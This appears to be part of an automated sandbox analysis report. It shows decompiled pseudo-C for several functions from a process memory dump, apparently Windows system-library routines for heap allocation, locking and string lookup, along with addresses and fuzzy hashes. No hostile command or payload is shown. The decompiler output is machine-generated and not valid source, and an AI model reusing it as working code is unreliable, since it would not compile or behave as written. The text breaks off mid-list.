C-Code - Quality: 79%

E01136DC9(signed int __ecx, void* __edx) { unsigned int _v8; intOrPtr _v12; signed int _v16; intOrPtr _v20; intOrPtr _v24; intOrPtr _v28; char _v32; char _v36; char _v40; char _v44; char _v48; char _v52; char _v56; char _v60; void* _t87; void* _t95; signed char* _t96; signed int _t107; signed int _t136; signed char* _t137; void* _t157; void* _t161; void* _t167; intOrPtr _t168; void* _t174; void* _t175; signed int _t176; void* _t177; _t136 = __ecx; _v44 = 0; _t167 = __edx; _v40 = 0; _v36 = 0; _v32 = 0; _v60 = 0; _v56 = 0; _v52 = 0; _v48 = 0; _v16 = __ecx; _t87 = L010D4620(__ecx, *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0x248); _t175 = _t87; if(_t175 != 0) { _t11 = _t175 + 0x30; // 0x30 *((short*)(_t175 + 6)) = 0x14d4; *((intOrPtr*)(_t175 + 0x20)) = *((intOrPtr*)(_t167 + 0x10)); *((intOrPtr*)(_t175 + 0x24)) = *((intOrPtr*)( *((intOrPtr*)(_t167 + 8)) + 0xc)); *((intOrPtr*)(_t175 + 0x28)) = _t136; *((intOrPtr*)(_t175 + 0x2c)) = *((intOrPtr*)(_t167 + 0x14)); E01136B4C(_t167, _t11, 0x214, &_v8); _v12 = _v8 + 0x10; _t95 = E010D7D50(); _t137 = 0x7ffe0384; if(_t95 == 0) { _t96 = 0x7ffe0384; } else { _t96 = *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a; } _push(_t175); _push(_v12); _push(0x402); _push( *_t96 & 0x000000ff); E010F9AE0(); _t87 = L010D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t175); _t176 = _v16; if((_t176 & 0x00000100) != 0) { _push( &_v36); _t157 = 4; _t87 = E0113795D( *((intOrPtr*)(_t167 + 8)), _t157); if(_t87 >= 0) { _v24 = E0113795D( *((intOrPtr*)(_t167 + 8)), 1, &_v44); _v28 = E0113795D( *((intOrPtr*)(_t167 + 8)), 0, &_v60); _push( &_v52); _t161 = 5; _t168 = E0113795D( *((intOrPtr*)(_t167 + 8)), _t161); _v20 = _t168; _t107 = L010D4620( *[fs:0x30], *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0xca0); _v16 = _t107; if(_t107 != 0) { _v8 = _v8 & 0x00000000; *(_t107 + 0x20) = _t176; *((short*)(_t107 + 6)) = 0x14d5; _t47 = _t107 + 0x24; // 0x24 _t177 = _t47; E01136B4C( &_v36, _t177, 0xc78, &_v8); _t51 = _v8 + 4; // 0x4 _t178 = _t177 + (_v8 >> 1) * 2; _v12 = _t51; E01136B4C( &_v44, _t177 + (_v8 >> 1) * 2, 0xc78, &_v8); _v12 = _v12 + _v8; E01136B4C( &_v60, _t178 + (_v8 >> 1) * 2, 0xc78, &_v8); _t125 = _v8; _v12 = _v12 + _v8; E01136B4C( &_v52, _t178 + (_v8 >> 1) * 2 + (_v8 >> 1) * 2, 0xc78 - _v8 - _v8 - _t125, &_v8); _t174 = _v12 + _v8; if(E010D7D50() != 0) { _t137 = *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a; } _push(_v16); _push(_t174); _push(0x402); _push( *_t137 & 0x000000ff); E010F9AE0(); L010D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v16); _t168 = _v20; } _t87 = L010D2400( &_v36); if(_v24 >= 0) { _t87 = L010D2400( &_v44); } if(_t168 >= 0) { _t87 = L010D2400( &_v52); } if(_v28 >= 0) { return L010D2400( &_v60); } } } } return _t87; } 0x01136dd4 0x01136dde 0x01136de1 0x01136de3 0x01136de6 0x01136de9 0x01136dec 0x01136def 0x01136df2 0x01136df5 0x01136dfe 0x01136e04 0x01136e09 0x01136e0d 0x01136e18 0x01136e1b 0x01136e22 0x01136e2d 0x01136e30 0x01136e36 0x01136e42 0x01136e4d 0x01136e50 0x01136e55 0x01136e5c 0x01136e6e 0x01136e5e 0x01136e67 0x01136e67 0x01136e73 0x01136e74 0x01136e77 0x01136e7c 0x01136e7d 0x01136e8e 0x01136e93 0x01136e9c 0x01136ea8 0x01136eab 0x01136eac 0x01136eb3 0x01136ecd 0x01136edc 0x01136ee2 0x01136ee5 0x01136ef2 0x01136efb 0x01136f01 0x01136f06 0x01136f0b 0x01136f11 0x01136f1a 0x01136f22 0x01136f26 0x01136f26 0x01136f33 0x01136f41 0x01136f44 0x01136f47 0x01136f54 0x01136f65 0x01136f77 0x01136f7c 0x01136f82 0x01136f91 0x01136f99 0x01136fa3 0x01136fae 0x01136fae 0x01136fba 0x01136fbb 0x01136fbc 0x01136fc1 0x01136fc2 0x01136fd3 0x01136fd8 0x01136fd8 0x01136fdf 0x01136fe8 0x01136fee 0x01136fee 0x01136ff5 0x01136ffb 0x01136ffb 0x01137004 0x00000000 0x0113700a 0x01137004 0x01136eb3 0x01136e9c 0x01137015

Memory Dump Source

Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true

Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp Download File Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp Download File

Similarity

API ID: String ID: API String ID: Opcode ID: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c Instruction ID: 4688730ff6b0a772967c475a2945fb8fb2ed3859bba09ec8af0bd3a414e00be0 Opcode Fuzzy Hash: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c Instruction Fuzzy Hash: E2718F71A00219EFCB15DFA9C984AEEFBB9FF88714F104169E505E7294DB30EA41CB90

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 39%

E0114B8D0(void* __edx, intOrPtr _a4, intOrPtr _a8, signed char _a12, signed int** _a16) { char _v8; signed int _v12; signed int _t80; signed int _t83; intOrPtr _t89; signed int _t92; signed char _t106; signed int* _t107; intOrPtr _t108; intOrPtr _t109; signed int _t114; void* _t115; void* _t117; void* _t119; void* _t122; signed int _t123; signed int* _t124; _t106 = _a12; if((_t106 & 0xfffffffc) != 0) { return 0xc000000d; } if((_t106 & 0x00000002) != 0) { _t106 = _t106 | 0x00000001; } _t109 = *0x11a7b9c; // 0x0 _t124 = L010D4620(_t109 + 0x140000, *((intOrPtr*)( *[fs:0x30] + 0x18)), _t109 + 0x140000, 0x424 + (_a8 - 1) * 0xc); if(_t124 != 0) { *_t124 = *_t124 & 0x00000000; _t124[1] = _t124[1] & 0x00000000; _t124[4] = _t124[4] & 0x00000000; if( *((intOrPtr*)( *[fs:0x18] + 0xf9c)) == 0) { L13: _push(_t124); if((_t106 & 0x00000002) != 0) { _push(0x200); _push(0x28); _push(0xffffffff); _t122 = E010F9800(); if(_t122 < 0) { L33: if((_t124[4] & 0x00000001) != 0) { _push(4); _t64 = &(_t124[1]); // 0x4 _t107 = _t64; _push(_t107); _push(5); _push(0xfffffffe); E010F95B0(); if( *_t107 != 0) { _push( *_t107); E010F95D0(); } } _push(_t124); _push(0); _push( *((intOrPtr*)( *[fs:0x30] + 0x18))); L37: L010D77F0(); return _t122; } _t124[4] = _t124[4] | 0x00000002; L18: _t108 = _a8; _t29 = &(_t124[0x105]); // 0x414 _t80 = _t29; _t30 = &(_t124[5]); // 0x14 _t124[3] = _t80; _t123 = 0; _t124[2] = _t30; *_t80 = _t108; if(_t108 == 0) { L21: _t112 = 0x400; _push( &_v8); _v8 = 0x400; _push(_t124[2]); _push(0x400); _push(_t124[3]); _push(0); _push( *_t124); _t122 = E010F9910(); if(_t122 != 0xc0000023) { L26: if(_t122 != 0x106) { L40: if(_t122 < 0) { L29: _t83 = _t124[2]; if(_t83 != 0) { _t59 = &(_t124[5]); // 0x14 if(_t83 != _t59) { L010D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t83); } } _push( *_t124); E010F95D0(); goto L33; } *_a16 = _t124; return 0; } if(_t108 != 1) { _t122 = 0; goto L40; } _t122 = 0xc0000061; goto L29; } else { goto L22; } while(1) { L22: _t89 = *0x11a7b9c; // 0x0 _t92 = L010D4620(_t112, *((intOrPtr*)( *[fs:0x30] + 0x18)), _t89 + 0x140000, _v8); _t124[2] = _t92; if(_t92 == 0) { break; } _t112 = &_v8; _push( &_v8); _push(_t92); _push(_v8); _push(_t124[3]); _push(0); _push( *_t124); _t122 = E010F9910(); if(_t122 != 0xc0000023) { goto L26; } L010D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t124[2]); } _t122 = 0xc0000017; goto L26; } _t119 = 0; do { _t114 = _t124[3]; _t119 = _t119 + 0xc; *((intOrPtr*)(_t114 + _t119 - 8)) = *((intOrPtr*)(_a4 + _t123 * 4)); *(_t114 + _t119 - 4) = *(_t114 + _t119 - 4) & 0x00000000; _t123 = _t123 + 1; *((intOrPtr*)(_t124[3] + _t119)) = 2; } while (_t123 < _t108); goto L21; } _push(0x28); _push(3); _t122 = E010BA7B0(); if(_t122 < 0) { goto L33; } _t124[4] = _t124[4] | 0x00000001; goto L18; } if((_t106 & 0x00000001) == 0) { _t115 = 0x28; _t122 = E0114E7D3(_t115, _t124); if(_t122 < 0) { L9: _push(_t124); _push(0); _push( *((intOrPtr*)( *[fs:0x30] + 0x18))); goto L37; } L12: if( *_t124 != 0) { goto L18; } goto L13; } _t15 = &(_t124[1]); // 0x4 _t117 = 4; _t122 = E0114E7D3(_t117, _t15); if(_t122 >= 0) { _t124[4] = _t124[4] | 0x00000001; _v12 = _v12 & 0x00000000; _push(4); _push( &_v12); _push(5); _push(0xfffffffe); E010F95B0(); goto L12; } goto L9; } else { return 0xc0000017; } } 0x0114b8d9 0x0114b8e4 0x00000000 0x0114b8e6 0x0114b8f3 0x0114b8f5 0x0114b8f5 0x0114b8f8 0x0114b920 0x0114b924 0x0114b936 0x0114b939 0x0114b93d 0x0114b948 0x0114b9a0 0x0114b9a0 0x0114b9a4 0x0114b9bf 0x0114b9c4 0x0114b9c6 0x0114b9cd 0x0114b9d1 0x0114bad4 0x0114bad8 0x0114bada 0x0114badc 0x0114badc 0x0114badf 0x0114bae0 0x0114bae2 0x0114bae4 0x0114baec 0x0114baee 0x0114baf0 0x0114baf0 0x0114baec 0x0114bafb 0x0114bafc 0x0114bafe 0x0114bb01 0x0114bb01 0x00000000 0x0114bb06 0x0114b9d7 0x0114b9db 0x0114b9db 0x0114b9de 0x0114b9de 0x0114b9e4 0x0114b9e7 0x0114b9ea 0x0114b9ec 0x0114b9ef 0x0114b9f3 0x0114ba1b 0x0114ba1b 0x0114ba23 0x0114ba24 0x0114ba27 0x0114ba2a 0x0114ba2b 0x0114ba2e 0x0114ba30 0x0114ba37 0x0114ba3f 0x0114ba9c 0x0114baa2 0x0114bb13 0x0114bb15 0x0114baae 0x0114baae 0x0114bab3 0x0114bab5 0x0114baba 0x0114bac8 0x0114bac8 0x0114baba 0x0114bacd 0x0114bacf 0x00000000 0x0114bacf 0x0114bb1a 0x00000000 0x0114bb1c 0x0114baa7 0x0114bb11 0x00000000 0x0114bb11 0x0114baa9 0x00000000 0x00000000 0x00000000 0x00000000 0x0114ba41 0x0114ba41 0x0114ba41 0x0114ba58 0x0114ba5d 0x0114ba62 0x00000000 0x00000000 0x0114ba64 0x0114ba67 0x0114ba68 0x0114ba69 0x0114ba6c 0x0114ba6f 0x0114ba71 0x0114ba78 0x0114ba80 0x00000000 0x00000000 0x0114ba90 0x0114ba90 0x0114ba97 0x00000000 0x0114ba97 0x0114b9f5 0x0114b9f7 0x0114b9f7 0x0114b9fa 0x0114ba03 0x0114ba07 0x0114ba0c 0x0114ba10 0x0114ba17 0x00000000 0x0114b9f7 0x0114b9a6 0x0114b9a8 0x0114b9af 0x0114b9b3 0x00000000 0x00000000 0x0114b9b9 0x00000000 0x0114b9b9 0x0114b94d 0x0114b98f 0x0114b995 0x0114b999 0x0114b960 0x0114b967 0x0114b968 0x0114b96a 0x00000000 0x0114b96a 0x0114b99b 0x0114b99e 0x00000000 0x00000000 0x00000000 0x0114b99e 0x0114b951 0x0114b954 0x0114b95a 0x0114b95e 0x0114b972 0x0114b979 0x0114b97d 0x0114b97f 0x0114b980 0x0114b982 0x0114b984 0x00000000 0x0114b984 0x00000000 0x0114b926 0x00000000 0x0114b926

Memory Dump Source

Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true

Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp Download File Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp Download File

Similarity

API ID: String ID: API String ID: Opcode ID: 70d21a75a5c49d930206704d03d03863db7e1e4cf28c290d73239274057cf290 Instruction ID: 2034d695efc679cbbaa3f85bd43bc2aa452531b34ae8102ceb4b19bc10d24b60 Opcode Fuzzy Hash: 70d21a75a5c49d930206704d03d03863db7e1e4cf28c290d73239274057cf290 Instruction Fuzzy Hash: D3713472204702EFE739CF18C845F96BBE5EF44B20F214928E695876A0EB75E941CB44

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%

E010E2AE4(intOrPtr* __ecx, intOrPtr __edx, signed int _a4, short* _a8, intOrPtr _a12, signed int* _a16) { signed short* _v8; signed short* _v12; intOrPtr _v16; intOrPtr _v20; intOrPtr _v24; intOrPtr* _v28; signed int _v32; signed int _v36; short _t56; signed int _t57; intOrPtr _t58; signed short* _t61; intOrPtr _t72; intOrPtr _t75; intOrPtr _t84; intOrPtr _t87; intOrPtr* _t90; signed short* _t91; signed int _t95; signed short* _t96; intOrPtr _t97; intOrPtr _t102; signed int _t108; intOrPtr _t110; signed int _t111; signed short* _t112; void* _t113; signed int _t116; signed short** _t119; short* _t120; signed int _t123; signed int _t124; void* _t125; intOrPtr _t127; signed int _t128; _t90 = __ecx; _v16 = __edx; _t108 = _a4; _v28 = __ecx; _t4 = _t108 - 1; // -1 if(_t4 > 0x13) { L15: _t56 = 0xc0000100; L16: return _t56; } _t57 = _t108 * 0x1c; _v32 = _t57; _t6 = _t57 + 0x11a8204; // 0x0 _t123 = *_t6; _t7 = _t57 + 0x11a8208; // 0x11a8207 _t8 = _t57 + 0x11a8208; // 0x11a8207 _t119 = _t8; _v36 = _t123; _t110 = _t7 + _t123 * 8; _v24 = _t110; _t111 = _a4; if(_t119 >= _t110) { L12: if(_t123 != 3) { _t58 = *0x11a8450; // 0x5e17ec if(_t58 == 0) { _t58 = *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x48)); } } else { _t26 = _t57 + 0x11a821c; // 0x0 _t58 = *_t26; } *_t90 = _t58; goto L15; } else { goto L2; } while(1) { _t116 = *_t61 & 0x0000ffff; _t128 = *(_t127 + _t61) & 0x0000ffff; if(_t116 == _t128) { goto L18; } L5: if(_t116 >= 0x61) { if(_t116 > 0x7a) { _t97 = *0x11a6d5c; // 0x7f360654 _t72 = *0x11a6d5c; // 0x7f360654 _t75 = *0x11a6d5c; // 0x7f360654 _t116 = *((intOrPtr*)(_t75 + (( *(_t72 + (( *(_t97 + (_t116 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t116 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t116 & 0x0000000f)) * 2)) + _t116 & 0x0000ffff; } else { _t116 = _t116 - 0x20; } } if(_t128 >= 0x61) { if(_t128 > 0x7a) { _t102 = *0x11a6d5c; // 0x7f360654 _t84 = *0x11a6d5c; // 0x7f360654 _t87 = *0x11a6d5c; // 0x7f360654 _t128 = *((intOrPtr*)(_t87 + (( *(_t84 + (( *(_t102 + (_t128 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t128 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t128 & 0x0000000f)) * 2)) + _t128 & 0x0000ffff; } else { _t128 = _t128 - 0x20; } } if(_t116 == _t128) { _t61 = _v12; _t96 = _v8; } else { _t113 = _t116 - _t128; L9: _t111 = _a4; if(_t113 == 0) { _t115 = &(( *_t119)[_t111 + 1]); _t33 = &(_t119[1]); // 0x100 _t120 = _a8; _t95 = *_t33 - &(( *_t119)[_t111 + 1]) >> 1; _t35 = _t95 - 1; // 0xff _t124 = _t35; if(_t120 == 0) { L27: *_a16 = _t95; _t56 = 0xc0000023; goto L16; } if(_t124 >= _a12) { if(_a12 >= 1) { *_t120 = 0; } goto L27; } *_a16 = _t124; _t125 = _t124 + _t124; E010FF3E0(_t120, _t115, _t125); _t56 = 0; *((short*)(_t125 + _t120)) = 0; goto L16; } _t119 = &(_t119[2]); if(_t119 < _v24) { L2: _t91 = *_t119; _t61 = _t91; _v12 = _t61; _t112 = &(_t61[_t111]); _v8 = _t112; if(_t61 >= _t112) { break; } else { _t127 = _v16 - _t91; _t96 = _t112; _v20 = _t127; _t116 = *_t61 & 0x0000ffff; _t128 = *(_t127 + _t61) & 0x0000ffff; if(_t116 == _t128) { goto L18; } goto L5; } } else { _t90 = _v28; _t57 = _v32; _t123 = _v36; goto L12; } } L18: _t61 = &(_t61[1]); _v12 = _t61; if(_t61 >= _t96) { break; } _t127 = _v20; } _t113 = 0; goto L9; } 0x010e2ae4 0x010e2aec 0x010e2aef 0x010e2af4 0x010e2af7 0x010e2afd 0x010e2b92 0x010e2b92 0x010e2b97 0x010e2b9c 0x010e2b9c 0x010e2b03 0x010e2b06 0x010e2b09 0x010e2b09 0x010e2b0f 0x010e2b15 0x010e2b15 0x010e2b1b 0x010e2b1e 0x010e2b21 0x010e2b26 0x010e2b29 0x010e2b81 0x010e2b84 0x010e2c0e 0x010e2c15 0x010e2c24 0x010e2c24 0x010e2b8a 0x010e2b8a 0x010e2b8a 0x010e2b8a 0x010e2b90 0x00000000 0x00000000 0x00000000 0x00000000 0x010e2b4a 0x010e2b4a 0x010e2b4d 0x010e2b53 0x00000000 0x00000000 0x010e2b55 0x010e2b58 0x010e2bb7 0x01125d1b 0x01125d37 0x01125d47 0x01125d53 0x010e2bbd 0x010e2bbd 0x010e2bbd 0x010e2bb7 0x010e2b5d 0x010e2c2f 0x01125d5b 0x01125d77 0x01125d87 0x01125d93 0x010e2c35 0x010e2c35 0x010e2c35 0x010e2c2f 0x010e2b65 0x010e2b9f 0x010e2ba2 0x010e2b67 0x010e2b67 0x010e2b69 0x010e2b6b 0x010e2b6e 0x010e2bc9 0x010e2bcc 0x010e2bcf 0x010e2bd4 0x010e2bd6 0x010e2bd6 0x010e2bdb 0x010e2c02 0x010e2c05 0x010e2c07 0x00000000 0x010e2c07 0x010e2be0 0x010e2c00 0x010e2c3f 0x010e2c3f 0x00000000 0x010e2c00 0x010e2be5 0x010e2be7 0x010e2bec 0x010e2bf4 0x010e2bf6 0x00000000 0x010e2bf6 0x010e2b70 0x010e2b76 0x010e2b2b 0x010e2b2b 0x010e2b2d 0x010e2b2f 0x010e2b32 0x010e2b35 0x010e2b3a 0x00000000 0x010e2b40 0x010e2b43 0x010e2b45 0x010e2b47 0x010e2b4a 0x010e2b4d 0x010e2b53 0x00000000 0x00000000 0x00000000 0x010e2b53 0x010e2b78 0x010e2b78 0x010e2b7b 0x010e2b7e 0x00000000 0x010e2b7e 0x010e2b76 0x010e2ba5 0x010e2ba5 0x010e2ba8 0x010e2bad 0x00000000 0x00000000 0x010e2baf 0x010e2baf 0x010e2bc2 0x00000000

Memory Dump Source

Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true

Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp Download File Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp Download File

Similarity

API ID: String ID: API String ID: Opcode ID: eb2c3628e3d1c6bf60e082397451eb206b55c178387668eebcd4542bc59b12ee Instruction ID: 05844506193a849930aaae6d7b3e1e86027f981f16ada95eda03e7395266651d Opcode Fuzzy Hash: eb2c3628e3d1c6bf60e082397451eb206b55c178387668eebcd4542bc59b12ee Instruction Fuzzy Hash: A451C576B00125CFCB18CF1EC8949BDBBF6FB88700719845AE8969B315D730AE91CB90

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 86%

E010DDBE9(intOrPtr __ecx, intOrPtr __edx, signed int* _a4, intOrPtr _a8, intOrPtr _a12) { char _v5; signed int _v12; signed int* _v16; intOrPtr _v20; intOrPtr _v24; intOrPtr _v28; intOrPtr _v32; intOrPtr _v36; intOrPtr _v40; intOrPtr _v44; void* __ebx; void* __edi; signed int _t54; char* _t58; signed int _t66; intOrPtr _t67; intOrPtr _t68; intOrPtr _t72; intOrPtr _t73; signed int* _t75; intOrPtr _t79; intOrPtr _t80; char _t82; signed int _t83; signed int _t84; signed int _t88; signed int _t89; intOrPtr _t90; intOrPtr _t92; signed int _t97; intOrPtr _t98; intOrPtr* _t99; signed int* _t101; signed int* _t102; intOrPtr* _t103; intOrPtr _t105; signed int _t106; void* _t118; _t92 = __edx; _t75 = _a4; _t98 = __ecx; _v44 = __edx; _t106 = _t75[1]; _v40 = __ecx; if(_t106 < 0 || _t106 <= 0 && *_t75 < 0) { _t82 = 0; } else { _t82 = 1; } _v5 = _t82; _t6 = _t98 + 0xc8; // 0xc9 _t101 = _t6; *((intOrPtr*)(_t98 + 0xd4)) = _a12; _v16 = _t92 + ((0 | _t82 != 0x00000000) - 0x00000001 & 0x00000048) + 8; *((intOrPtr*)(_t98 + 0xd8)) = _a8; if(_t82 != 0) { *(_t98 + 0xde) = *(_t98 + 0xde) | 0x00000002; _t83 = *_t75; _t54 = _t75[1]; *_t101 = _t83; _t84 = _t83 | _t54; _t101[1] = _t54; if(_t84 == 0) { _t101[1] = _t101[1] & _t84; *_t101 = 1; } goto L19; } else { if(_t101 == 0) { E010BCC50(E010B4510(0xc000000d)); _t88 = *_t101; _t97 = _t101[1]; L15: _v12 = _t88; _t66 = _t88 - *_t75; _t89 = _t97; asm("sbb ecx, [ebx+0x4]"); _t118 = _t89 - _t97; if(_t118 <= 0 && (_t118 < 0 || _t66 < _v12)) { _t66 = _t66 | 0xffffffff; _t89 = 0x7fffffff; } *_t101 = _t66; _t101[1] = _t89; L19: if(E010D7D50() != 0) { _t58 = *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c; } else { _t58 = 0x7ffe0386; } _t102 = _v16; if( *_t58 != 0) { _t58 = E01188ED6(_t102, _t98); } _t76 = _v44; E010D2280(_t58, _v44); E010DDD82(_v44, _t102, _t98); E010DB944(_t102, _v5); return E010CFFB0(_t76, _t98, _t76); } _t99 = 0x7ffe03b0; do { _t103 = 0x7ffe0010; do { _t67 = *0x11a8628; // 0x0 _v28 = _t67; _t68 = *0x11a862c; // 0x0 _v32 = _t68; _v24 = *((intOrPtr*)(_t99 + 4)); _v20 = *_t99; while(1) { _t97 = *0x7ffe000c; _t90 = *0x7FFE0008; if(_t97 == *_t103) { goto L10; } asm("pause"); } L10: _t79 = _v24; _t99 = 0x7ffe03b0; _v12 = *0x7ffe03b0; _t72 = *0x7FFE03B4; _t103 = 0x7ffe0010; _v36 = _t72; } while (_v20 != _v12 || _t79 != _t72); _t73 = *0x11a8628; // 0x0 _t105 = _v28; _t80 = *0x11a862c; // 0x0 } while (_t105 != _t73 || _v32 != _t80); _t98 = _v40; asm("sbb edx, [ebp-0x20]"); _t88 = _t90 - _v12 - _t105; _t75 = _a4; asm("sbb edx, eax"); _t31 = _t98 + 0xc8; // 0x117fb53 _t101 = _t31; *_t101 = _t88; _t101[1] = _t97; goto L15; } } 0x010ddbe9 0x010ddbf2 0x010ddbf7 0x010ddbf9 0x010ddbfc 0x010ddc00 0x010ddc03 0x010ddc14 0x010ddd54 0x010ddd54 0x010ddd54 0x010ddc18 0x010ddc1d 0x010ddc1d 0x010ddc32 0x010ddc3b 0x010ddc3e 0x010ddc46 0x010ddd5b 0x010ddd62 0x010ddd64 0x010ddd67 0x010ddd69 0x010ddd6b 0x010ddd6e 0x010ddd70 0x010ddd73 0x010ddd73 0x00000000 0x010ddc4c 0x010ddc4e 0x01123ae3 0x01123ae8 0x01123aea 0x010ddce7 0x010ddce9 0x010ddcec 0x010ddcee 0x010ddcf0 0x010ddcf3 0x010ddcf5 0x01123af2 0x01123af5 0x01123af5 0x010ddd06 0x010ddd08 0x010ddd0b 0x010ddd12 0x01123b08 0x010ddd18 0x010ddd18 0x010ddd18 0x010ddd20 0x010ddd23 0x01123b16 0x01123b16 0x010ddd29 0x010ddd2d 0x010ddd36 0x010ddd40 0x010ddd51 0x010ddd51 0x010ddc54 0x010ddc59 0x010ddc59 0x010ddc5e 0x010ddc5e 0x010ddc63 0x010ddc66 0x010ddc6b 0x010ddc78 0x010ddc7b 0x010ddc81 0x010ddc81 0x010ddc83 0x010ddc89 0x00000000 0x00000000 0x010ddd7b 0x010ddd7b 0x010ddc8f 0x010ddc8f 0x010ddc92 0x010ddc99 0x010ddc9f 0x010ddca5 0x010ddcaa 0x010ddcaa 0x010ddcb3 0x010ddcb8 0x010ddcbb 0x010ddcc1 0x010ddccf 0x010ddcd2 0x010ddcd5 0x010ddcd7 0x010ddcda 0x010ddcdc 0x010ddcdc 0x010ddce2 0x010ddce4 0x00000000 0x010ddce4

Memory Dump Source

Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true

Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp Download File Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp Download File

Similarity

API ID: String ID: API String ID: Opcode ID: 4332fa389bd48b1fef49c6fd7b7ef1cb9f12eb3aad0e1e3aaccc158de3cf4088 Instruction ID: 1105d58b39beacabcd90ee855caeb68ea6871d33374e6fdc3da956f86d77783f Opcode Fuzzy Hash: 4332fa389bd48b1fef49c6fd7b7ef1cb9f12eb3aad0e1e3aaccc158de3cf4088 Instruction Fuzzy Hash: 5D518C71A0071ADFCB14DFA8C480AAEBBF5BB49310F24816AD599A7385DB31A944CB90

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 96%

E010CEF40(intOrPtr __ecx) { char _v5; char _v6; char _v7; char _v8; signed int _v12; intOrPtr _v16; intOrPtr _v20; void* __ebx; void* __edi; void* __esi; void* __ebp; intOrPtr _t58; char _t59; signed char _t69; void* _t73; signed int _t74; char _t79; signed char _t81; signed int _t85; signed int _t87; intOrPtr _t90; signed char* _t91; void* _t92; signed int _t94; void* _t96; _t90 = __ecx; _v16 = __ecx; if(( *(__ecx + 0x14) & 0x04000000) != 0) { _t58 = *((intOrPtr*)(__ecx)); if(_t58 != 0xffffffff && *((intOrPtr*)(_t58 + 8)) == 0) { E010B9080(_t73, __ecx, __ecx, _t92); } } _t74 = 0; _t96 = *0x7ffe036a - 1; _v12 = 0; _v7 = 0; if(_t96 > 0) { _t74 = *(_t90 + 0x14) & 0x00ffffff; _v12 = _t74; _v7 = _t96 != 0; } _t79 = 0; _v8 = 0; _v5 = 0; while(1) { L4: _t59 = 1; L5: while(1) { if(_t59 == 0) { L12: _t21 = _t90 + 4; // 0x775ec21e _t87 = *_t21; _v6 = 0; if(_t79 != 0) { if((_t87 & 0x00000002) != 0) { goto L19; } if((_t87 & 0x00000001) != 0) { _v6 = 1; _t74 = _t87 ^ 0x00000003; } else { _t51 = _t87 - 2; // -2 _t74 = _t51; } goto L15; } else { if((_t87 & 0x00000001) != 0) { _v6 = 1; _t74 = _t87 ^ 0x00000001; } else { _t26 = _t87 - 4; // -4 _t74 = _t26; if((_t74 & 0x00000002) == 0) { _t74 = _t74 - 2; } } L15: if(_t74 == _t87) { L19: E010B2D8A(_t74, _t90, _t87, _t90); _t74 = _v12; _v8 = 1; if(_v7 != 0 && _t74 > 0x64) { _t74 = _t74 - 1; _v12 = _t74; } _t79 = _v5; goto L4; } asm("lock cmpxchg [esi], ecx"); if(_t87 != _t87) { _t74 = _v12; _t59 = 0; _t79 = _v5; continue; } if(_v6 != 0) { _t74 = _v12; L25: if(_v7 != 0) { if(_t74 < 0x7d0) { if(_v8 == 0) { _t74 = _t74 + 1; } } _t38 = _t90 + 0x14; // 0x0 _t39 = _t90 + 0x14; // 0x0 _t85 = ( *_t38 ^ _t74) & 0x00ffffff ^ *_t39; if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) { _t85 = _t85 & 0xff000000; } *(_t90 + 0x14) = _t85; } *((intOrPtr*)(_t90 + 0xc)) = *((intOrPtr*)( *[fs:0x18] + 0x24)); *((intOrPtr*)(_t90 + 8)) = 1; return 0; } _v5 = 1; _t87 = _t74; goto L19; } } _t94 = _t74; _v20 = 1 + (0 | _t79 != 0x00000000) * 2; if(_t74 == 0) { goto L12; } else { _t91 = _t90 + 4; goto L8; L9: while((_t81 & 0x00000001) != 0) { _t69 = _t81; asm("lock cmpxchg [edi], edx"); if(_t69 != _t81) { _t81 = _t69; continue; } _t90 = _v16; goto L25; } asm("pause"); _t94 = _t94 - 1; if(_t94 != 0) { L8: _t81 = *_t91; goto L9; } else { _t90 = _v16; _t79 = _v5; goto L12; } } } } } 0x010cef4b 0x010cef4d 0x010cef57 0x010cf0bd 0x010cf0c2 0x010cf0d2 0x010cf0d2 0x010cf0c2 0x010cef5d 0x010cef5f 0x010cef67 0x010cef6a 0x010cef6d 0x010cef74 0x010cef7f 0x010cef82 0x010cef82 0x010cef86 0x010cef88 0x010cef8c 0x010cef8f 0x010cef8f 0x010cef8f 0x00000000 0x010cef91 0x010cef93 0x010cefc4 0x010cefc4 0x010cefc4 0x010cefca 0x010cefd0 0x010cf0a6 0x00000000 0x00000000 0x010cf0af 0x0111bb06 0x0111bb0a 0x010cf0b5 0x010cf0b5 0x010cf0b5 0x010cf0b5 0x00000000 0x010cefd6 0x010cefd9 0x010cf0de 0x010cf0e2 0x010cefdf 0x010cefdf 0x010cefdf 